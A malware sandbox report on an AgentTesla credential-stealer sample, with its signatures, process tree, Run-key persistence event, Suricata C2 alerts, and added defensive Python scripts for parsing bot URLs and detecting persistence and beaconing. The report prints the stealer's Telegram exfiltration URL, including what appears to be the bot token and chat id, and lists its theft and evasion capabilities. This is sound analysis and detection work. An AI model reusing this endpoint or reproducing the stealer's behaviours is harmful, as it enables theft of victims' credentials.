
Windows Analysis Report
gq8sce-clean.com.com.exe

Overview

General Information

Sample name: gq8sce-clean.com.com.exe
Analysis ID: 1619245
MD5: 07204fe9a49ed5d81a374b581fa0f28f
SHA1: 634a80dd70ff05559dcdbb3c596812e74e138c30
SHA256: 4b28f2d12a371caffd53ea2375395e33a8fcd238828586d1ff82be2d7aeac3e9
Tags: bot7592112496, DropBox, exe, files-catbox-moe, kvrcmhqc-ngrok-io, ZolaKeylogger, user-marsomx

Detection

AgentTesla, Discord Token Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected Discord Token Stealer
Yara detected Telegram RAT
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • gq8sce-clean.com.com.exe (PID: 4668 cmdline: "C:\Users\user\Desktop\gq8sce-clean.com.com.exe" MD5: 07204FE9A49ED5D81A374B581FA0F28F)
  • OgBoRN.exe (PID: 6656 cmdline: "C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe" MD5: 07204FE9A49ED5D81A374B581FA0F28F)
  • OgBoRN.exe (PID: 5588 cmdline: "C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe" MD5: 07204FE9A49ED5D81A374B581FA0F28F)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendMessage?chat_id=6089330336"}
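The two configuration strings above carry everything needed to identify the attacker's exfiltration channel: the Bot API URL embeds the bot's numeric id and its secret token in the path (`/bot<id>:<secret>/sendMessage`) and the destination chat in the query string. The bot id is the same value that appears in the report's tags (`bot7592112496`). The following is an added example, not code from the Joe Sandbox report or its configuration extractor: it parses those URLs, scans arbitrary text (strings from a memory dump or a PCAP) for further bot URLs, and redacts the secret so the indicator can be shared without handing out a working credential. The regular expression and the function names are this example's own; the only input it uses verbatim is the two JSON lines printed in the report.

```python
"""Parse and hunt for Telegram Bot API exfiltration URLs in extracted malware configs.

Added example (not part of the Joe Sandbox report). REPORT_CONFIGS reproduces the
two configuration strings printed in the report; everything else is this example's own.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Configuration strings exactly as printed in the report.
REPORT_CONFIGS = [
    '{"C2 url": "https://api.telegram.org/bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendMessage"}',
    '{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendMessage?chat_id=6089330336"}',
]

# Bot API URLs put the credential in the path: /bot<numeric id>:<secret>/<method>.
# The secret is an alphanumeric string that may contain '-' and '_' (assumption: length >= 20).
BOT_URL_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{20,})/(?P<method>[A-Za-z]+)"
)


def parse_bot_url(url):
    """Split a Bot API URL into bot id, secret, API method and chat_id (None if absent)."""
    m = BOT_URL_RE.match(url)
    if not m:
        return None
    query = parse_qs(urlsplit(url).query)
    return {
        "bot_id": m["bot_id"],
        "secret": m["secret"],
        "method": m["method"],
        "chat_id": query.get("chat_id", [None])[0],
    }


def extract_from_config(config_json):
    """Return parsed bot URLs found in any string value of an extracted config."""
    found = []
    for value in json.loads(config_json).values():
        if isinstance(value, str):
            parsed = parse_bot_url(value)
            if parsed:
                found.append(parsed)
    return found


def hunt_bot_urls(blob):
    """Scan raw text (memory-dump strings, a PCAP, a dropped config) for bot URLs.

    Returns deduplicated (bot_id, secret) pairs: that pair identifies one attacker bot
    regardless of which API method or chat id a given sample uses.
    """
    return sorted({(m["bot_id"], m["secret"]) for m in BOT_URL_RE.finditer(blob)})


def redact(url):
    """Mask the secret so the URL can go into a report or IOC feed without leaking the token."""
    return BOT_URL_RE.sub(
        lambda m: f"https://api.telegram.org/bot{m['bot_id']}:<redacted>/{m['method']}", url
    )


if __name__ == "__main__":
    for cfg in REPORT_CONFIGS:
        for hit in extract_from_config(cfg):
            print(hit["bot_id"], hit["method"], hit["chat_id"])
    print(hunt_bot_urls("\n".join(REPORT_CONFIGS)))
```

The bot id and chat id are stable pivots across samples built with the same Telegram settings; the secret is a live credential for the attacker's bot and should be treated like any other captured credential (redacted in shared IOCs, reported to Telegram for revocation rather than exercised).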
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author
00000003.00000002.2401382417.0000000007D27000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000003.00000002.2401382417.0000000007D27000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(27 entries in total; the first 5 are shown)
Sigma rule: CurrentVersion Autorun Keys Modification
Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\gq8sce-clean.com.com.exe, ProcessId: 4668, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OgBoRN
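The Sigma match above is the persistence step: the submitted binary (running from the Desktop) writes an HKCU Run value that points at the copy it dropped under AppData\Roaming, so the dropped copy starts at the next logon and the original can be deleted. The writer and the registered binary differ, and both live in user-writable locations. The following is an added example, not the Sigma rule itself or Joe Sandbox code: a small detector over Sysmon Event ID 13 records that fires on exactly that combination. The first record reproduces the event the report shows; the other two are constructed benign cases, and the path patterns and threshold are this example's own heuristics.

```python
"""Flag Run-key persistence in Sysmon Event ID 13 (RegistryEvent, value set) records.

Added example, not part of the report or of the cited Sigma rule. SAMPLE_EVENTS[0]
reproduces the event shown in the report; the other records are constructed.
"""
import re

# Autostart keys under CurrentVersion (HKCU or HKLM), case-insensitive.
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce|RunServices|RunServicesOnce)(Ex)?\\",
    re.IGNORECASE,
)
# Locations an unprivileged user can write to; installers normally use Program Files instead.
USER_WRITABLE_RE = re.compile(
    r"\\Users\\[^\\]+\\(AppData\\Roaming|AppData\\Local\\Temp|Downloads|Desktop|Public)\\",
    re.IGNORECASE,
)

SAMPLE_EVENTS = [
    # Reproduced from the report's Sigma match.
    {"EventID": 13, "EventType": "SetValue", "ProcessId": 4668,
     "Image": r"C:\Users\user\Desktop\gq8sce-clean.com.com.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OgBoRN",
     "Details": r"C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe"},
    # Constructed: an installer in Program Files registering its own agent binary.
    {"EventID": 13, "EventType": "SetValue", "ProcessId": 1234,
     "Image": r"C:\Program Files\Example\setup.exe",
     "TargetObject": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExampleAgent",
     "Details": r'"C:\Program Files\Example\agent.exe" --background'},
    # Constructed: a registry write to a key that is not an autostart location.
    {"EventID": 13, "EventType": "SetValue", "ProcessId": 999,
     "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]


def binary_path(details):
    """Extract the executable path from a Run value ("quoted path" args, or bare path)."""
    details = details.strip()
    if details.startswith('"'):
        return details[1:details.find('"', 1)]
    return details.split(" ")[0]  # unquoted paths containing spaces are truncated here


def evaluate(event):
    """Return the reasons an event looks like malicious persistence (empty list = nothing)."""
    if event.get("EventID") != 13 or event.get("EventType") != "SetValue":
        return []
    if not RUN_KEY_RE.search(event.get("TargetObject", "")):
        return []
    reasons = ["autorun key modified"]
    target = binary_path(event.get("Details", ""))
    image = event.get("Image", "")
    if USER_WRITABLE_RE.search(target):
        reasons.append("autostart binary lives in a user-writable directory")
    if USER_WRITABLE_RE.search(image):
        reasons.append("writer process runs from a user-writable directory")
    if image and target and image.lower() != target.lower() and USER_WRITABLE_RE.search(image):
        reasons.append("writer registered a different binary (self-copy under a new name)")
    return reasons


def scan(events, min_reasons=2):
    """Alert on events that accumulate at least min_reasons; a bare Run-key write alone is not enough."""
    alerts = []
    for event in events:
        reasons = evaluate(event)
        if len(reasons) >= min_reasons:
            alerts.append({"ProcessId": event["ProcessId"],
                           "TargetObject": event["TargetObject"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["ProcessId"], alert["TargetObject"])
        for reason in alert["reasons"]:
            print("  -", reason)
```

The threshold of two reasons keeps ordinary installers (one reason: the key write itself) below the alert line while the self-copy-from-Desktop-to-AppData pattern in this report scores four. The report's signature "Monitors certain registry keys / values for changes" suggests the malware also re-asserts this value if it is removed, so expect repeated Event ID 13 records for the same TargetObject from the dropped copy (PIDs 6656 and 5588 in the process tree) after the initial write.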
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-19T18:03:35.283867+0100 | 2851779 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49707 | 149.154.167.220 | 443 | TCP
2025-02-19T18:03:51.961887+0100 | 2851779 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49767 | 149.154.167.220 | 443 | TCP
2025-02-19T18:04:00.253058+0100 | 2851779 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49822 | 149.154.167.220 | 443 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-19T18:03:35.283867+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49707 | 149.154.167.220 | 443 | TCP
2025-02-19T18:03:36.529991+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49708 | 149.154.167.220 | 443 | TCP
2025-02-19T18:03:51.961887+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49767 | 149.154.167.220 | 443 | TCP
2025-02-19T18:03:53.211057+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49778 | 149.154.167.220 | 443 | TCP
2025-02-19T18:04:00.253058+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49822 | 149.154.167.220 | 443 | TCP
2025-02-19T18:04:01.453990+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49833 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:00.905852+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49990 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:03.328681+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49991 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:30.709900+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49992 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:33.920333+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49993 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:36.960131+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49994 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:37.356132+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49995 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:38.412033+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49996 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:39.200970+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49997 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:45.269875+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49998 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:45.595638+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49999 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:49.012018+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50000 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:50.189117+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50001 | 149.154.167.220 | 443 | TCP
2025-02-19T18:06:09.214055+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50002 | 149.154.167.220 | 443 | TCP
2025-02-19T18:06:10.729552+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50003 | 149.154.167.220 | 443 | TCP
2025-02-19T18:06:11.257226+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50004 | 149.154.167.220 | 443 | TCP
2025-02-19T18:06:22.996443+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50005 | 149.154.167.220 | 443 | TCP
2025-02-19T18:06:31.960977+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50006 | 149.154.167.220 | 443 | TCP
2025-02-19T18:06:35.161807+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50007 | 149.154.167.220 | 443 | TCP
2025-02-19T18:06:56.883691+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50008 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:05.389448+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50009 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:10.136433+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50010 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:14.575917+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50011 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:24.875136+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50012 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:24.950294+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50013 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:44.465223+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50015 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:45.031484+0100 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50016 | 149.154.167.220 | 443 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-19T18:03:35.283883+0100 | 2854281 | 1 | A Network Trojan was detected | 149.154.167.220 | 443 | 192.168.2.5 | 49707 | TCP
2025-02-19T18:03:36.530218+0100 | 2854281 | 1 | A Network Trojan was detected | 149.154.167.220 | 443 | 192.168.2.5 | 49708 | TCP
2025-02-19T18:03:51.962109+0100 | 2854281 | 1 | A Network Trojan was detected | 149.154.167.220 | 443 | 192.168.2.5 | 49767 | TCP
2025-02-19T18:03:53.211383+0100 | 2854281 | 1 | A Network Trojan was detected | 149.154.167.220 | 443 | 192.168.2.5 | 49778 | TCP
2025-02-19T18:04:00.253227+0100 | 2854281 | 1 | A Network Trojan was detected | 149.154.167.220 | 443 | 192.168.2.5 | 49822 | TCP
2025-02-19T18:04:01.454258+0100 | 2854281 | 1 | A Network Trojan was detected | 149.154.167.220 | 443 | 192.168.2.5 | 49833 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-19T18:03:34.940295+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49707 | 149.154.167.220 | 443 | TCP
2025-02-19T18:03:36.278410+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49708 | 149.154.167.220 | 443 | TCP
2025-02-19T18:03:51.720019+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49767 | 149.154.167.220 | 443 | TCP
2025-02-19T18:03:52.944153+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49778 | 149.154.167.220 | 443 | TCP
2025-02-19T18:03:59.958365+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49822 | 149.154.167.220 | 443 | TCP
2025-02-19T18:04:01.226593+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49833 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:00.902938+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49990 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:03.327639+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49991 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:30.707636+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49992 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:33.919393+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49993 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:36.943891+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49994 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:37.355072+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49995 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:38.388316+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49996 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:39.200125+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49997 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:45.268770+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49998 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:45.594697+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49999 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:49.009597+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50000 | 149.154.167.220 | 443 | TCP
2025-02-19T18:05:50.188205+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50001 | 149.154.167.220 | 443 | TCP
2025-02-19T18:06:09.212451+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50002 | 149.154.167.220 | 443 | TCP
2025-02-19T18:06:10.728620+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50003 | 149.154.167.220 | 443 | TCP
2025-02-19T18:06:11.256333+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50004 | 149.154.167.220 | 443 | TCP
2025-02-19T18:06:22.975386+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50005 | 149.154.167.220 | 443 | TCP
2025-02-19T18:06:31.960137+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50006 | 149.154.167.220 | 443 | TCP
2025-02-19T18:06:35.159474+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50007 | 149.154.167.220 | 443 | TCP
2025-02-19T18:06:56.882485+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50008 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:05.388197+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50009 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:10.130874+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50010 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:14.574737+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50011 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:24.872651+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50012 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:24.946298+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50013 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:43.540626+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50014 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:44.464422+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50015 | 149.154.167.220 | 443 | TCP
2025-02-19T18:07:45.030575+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 50016 | 149.154.167.220 | 443 | TCP
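The four alert tables above describe far fewer events than their row count suggests: several rules fire on the same TCP connection (the same client port appears under SIDs 1810008, 2851779, 2852815 and 2854281, the last one on the server-to-client direction), so the useful unit is the connection, not the alert. Read per connection, the data shows the sample contacting 149.154.167.220:443 (the address its api.telegram.org traffic went to in this run) over thirty times in four minutes, in bursts of closely spaced connections. Because that address belongs to a public service that legitimate users also reach, an IP block is a poor control; the bot URL from the configuration and the repeated-connection pattern are the better pivots. The following is an added example, not Joe Sandbox or Suricata code: it reads Suricata EVE JSON alert records, folds both directions of a connection into one flow, and summarises per server endpoint. The records are constructed in EVE shape from six of the connections listed above (timestamps, ports and SIDs as printed; rule names are not on the page and are omitted), and the helper names and the three-connection threshold are this example's own.

```python
"""Fold Suricata EVE alerts into connections and summarise repeated C2 contact per endpoint.

Added example, not part of the report. SAMPLE_EVE is constructed in Suricata's EVE JSON
record shape from six connections in the report's alert tables.
"""
import json
from collections import defaultdict
from datetime import datetime
from statistics import median


def eve(ts, sid, category, src, sport, dst, dport):
    """Build one EVE alert line (helper for the constructed sample only)."""
    return json.dumps({
        "timestamp": ts, "event_type": "alert", "proto": "TCP",
        "src_ip": src, "src_port": sport, "dest_ip": dst, "dest_port": dport,
        "alert": {"signature_id": sid, "severity": 1, "category": category},
    })


VICTIM, TG = "192.168.2.5", "149.154.167.220"
C2 = "Malware Command and Control Activity Detected"
BAD = "Potentially Bad Traffic"
SAMPLE_EVE = "\n".join([
    eve("2025-02-19T18:03:34.940295+0100", 1810008, BAD, VICTIM, 49707, TG, 443),
    eve("2025-02-19T18:03:35.283867+0100", 2851779, C2, VICTIM, 49707, TG, 443),
    eve("2025-02-19T18:03:35.283867+0100", 2852815, C2, VICTIM, 49707, TG, 443),
    eve("2025-02-19T18:03:35.283883+0100", 2854281, "A Network Trojan was detected", TG, 443, VICTIM, 49707),
    eve("2025-02-19T18:03:36.278410+0100", 1810008, BAD, VICTIM, 49708, TG, 443),
    eve("2025-02-19T18:03:36.529991+0100", 2852815, C2, VICTIM, 49708, TG, 443),
    eve("2025-02-19T18:03:51.720019+0100", 1810008, BAD, VICTIM, 49767, TG, 443),
    eve("2025-02-19T18:03:51.961887+0100", 2852815, C2, VICTIM, 49767, TG, 443),
    eve("2025-02-19T18:03:52.944153+0100", 1810008, BAD, VICTIM, 49778, TG, 443),
    eve("2025-02-19T18:03:59.958365+0100", 1810008, BAD, VICTIM, 49822, TG, 443),
    eve("2025-02-19T18:04:01.226593+0100", 1810008, BAD, VICTIM, 49833, TG, 443),
])


def flow_key(rec):
    """(client_ip, client_port, server_ip, server_port); the lower port is taken as the server."""
    a = (rec["src_ip"], rec["src_port"])
    b = (rec["dest_ip"], rec["dest_port"])
    client, server = (a, b) if a[1] > b[1] else (b, a)
    return client + server


def parse_ts(ts):
    """Suricata timestamps: ISO 8601 with microseconds and a numeric UTC offset."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def correlate(eve_text):
    """Group alert records by connection: first alert time, SIDs seen, best (lowest) severity."""
    flows = {}
    for line in eve_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec.get("event_type") != "alert":
            continue
        flow = flows.setdefault(flow_key(rec), {"first": None, "sids": set(), "severity": 99})
        seen = parse_ts(rec["timestamp"])
        if flow["first"] is None or seen < flow["first"]:
            flow["first"] = seen
        flow["sids"].add(rec["alert"]["signature_id"])
        flow["severity"] = min(flow["severity"], rec["alert"]["severity"])
    return flows


def summarise(flows, min_connections=3):
    """Per server endpoint: connection count, SIDs, median gap between connection starts,
    and a flag when at least min_connections severity-1 connections hit the same endpoint."""
    by_server = defaultdict(list)
    for key, flow in flows.items():
        by_server[(key[2], key[3])].append(flow)
    summary = {}
    for server, fl in by_server.items():
        starts = sorted(f["first"] for f in fl)
        gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
        summary[server] = {
            "connections": len(fl),
            "sids": sorted(set().union(*(f["sids"] for f in fl))),
            "median_gap_s": round(median(gaps), 3) if gaps else None,
            "flagged": sum(f["severity"] == 1 for f in fl) >= min_connections,
        }
    return summary


if __name__ == "__main__":
    for server, info in summarise(correlate(SAMPLE_EVE)).items():
        print(server, info)
```

On the full set of rows above, the same fold gives one endpoint with roughly thirty connections and a median gap of a few seconds, which is the beaconing signal worth alerting on; the per-rule row counts on their own overstate the event by about a factor of three.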


              AV Detection

Source: OgBoRN.exe.6656.3.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendMessage"}
Source: OgBoRN.exe.6656.3.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendMessage?chat_id=6089330336"}
Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | ReversingLabs: Detection: 44%
Source: gq8sce-clean.com.com.exe | ReversingLabs: Detection: 44%
Source: gq8sce-clean.com.com.exe | Virustotal: Detection: 27%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: gq8sce-clean.com.com.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49767 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49799 version: TLS 1.2
